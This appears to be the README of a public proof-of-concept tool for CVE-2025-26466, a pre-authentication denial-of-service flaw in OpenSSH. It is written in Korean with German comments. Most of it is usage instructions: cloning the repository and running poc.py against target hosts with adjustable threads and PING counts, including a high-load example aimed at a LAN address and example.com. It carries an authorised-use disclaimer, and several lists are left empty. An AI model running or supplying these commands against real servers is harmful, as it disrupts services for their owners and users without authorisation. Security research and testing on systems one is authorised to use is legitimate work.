
CVE-2025-26466 OpenSSH SSH2_MSG_PING DoS PoC
면책 조항: 이 코드는 오직 교육 목적 및 승인된 보안 테스트를 위한 것입니다. 승인되지 않은 외부 시스템에 대한 공격은 불법입니다.
CVE-2025-26466은 OpenSSH의 사전 인증 DoS(서비스 거부) 취약점으로, 키 교환(Key Exchange)이 완료되기 전에 SSH 서버에 과부하를 발생시킬 수 있습니다.
서버는 인증된 연결 없이 초기 핸드셰이크 중에 SSH2_MSG_PING 패킷(메시지 유형 192)을 이미 수락합니다. 이로 인해 다음이 발생합니다:
# Repository klonen
git clone https://github.com/acidboonrs/cve-2025-26466-openssh-poc.git
cd cve-2025-26466-openssh-poc
# Berechtigung für Ausführung (optional)
chmod +x poc.py
추가 종속성은 필요하지 않습니다(표준 라이브러리만 사용).
python3 poc.py 192.168.1.10
python3 poc.py <ziel-host> [port] [threads] [pings]
매개변수:
<ziel-host> - 대상 IP 또는 호스트명 (필수)[port] - SSH 포트 (기본값: 22)[threads] - 병렬 연결 수 (기본값: 10)[pings] - 연결당 PING 수 (기본값: 500)# Standard: localhost, Port 22, 10 Threads, 500 PINGs
python3 poc.py localhost
# Erhöhte Last: 50 Threads, 1000 PINGs
python3 poc.py 192.168.1.10 22 50 1000
# Custom Port
python3 poc.py example.com 2222 20 800
MIT 라이선스 - 자세한 내용은 LICENSE를 참조하세요.
이 PoC는 다음 이유로 공개되었습니다:
이 코드는 다음 경우에만 사용하세요.
승인되지 않은 DoS 공격은 처벌 대상입니다!
저자: Vollassiliz (voidcall.dev)
생성일: 2025-01-29